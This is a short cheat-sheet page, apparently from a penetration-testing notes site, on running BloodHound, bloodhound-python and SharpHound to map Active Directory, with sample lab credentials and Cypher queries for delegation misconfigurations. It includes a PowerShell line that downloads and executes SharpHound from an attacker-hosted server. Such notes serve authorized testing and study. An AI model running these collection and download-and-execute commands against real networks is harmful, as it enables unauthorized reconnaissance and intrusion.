BloodHound

Then to use it:

neo4j console

navigate to http://localhost:7474

conect with neo4j as user and password and change password

Once changed the password and with neo4j running:

bloodhound

First add IP and domain name to the /etc/hosts and nameserver {Domain Controller IP} to the /etc/resolve.conf

bloodhound-python -u {user} -p {password} -dc {HOST} --disable-autogc -d {Domain}

bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all

bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 -c DcOnly

AzureHound for Azure Active Directory

SharpHound.exe or SharpHound.ps1 for Local Active Directory

IEX(New-Object Net.WebClient).downloadString('http://{My_IP}:{PORT}/SharpHound.ps1')

Invoke-BloodHound -CollectorMethod All

Invoke-BloodHound -CollectionMethod All,GPOLocalGroup

Invoke-BloodHound -CollectionMethod LoggedOn

.\SharpHound.exe -c all,GPOLocalGroup (all collection doesn't include GPOLocalGroup by default)

Replace the customqueries.json file located

at /home/username/.config/bloodhound/customqueries.json or C:\Users\USERNAME\

AppData\Roaming\BloodHound\customqueries.json.

To identify all computers that are permitted for unconstrained delegation:

MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

To identify all computers and users configured for constrained delegation:

MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p

Last updated 1 year ago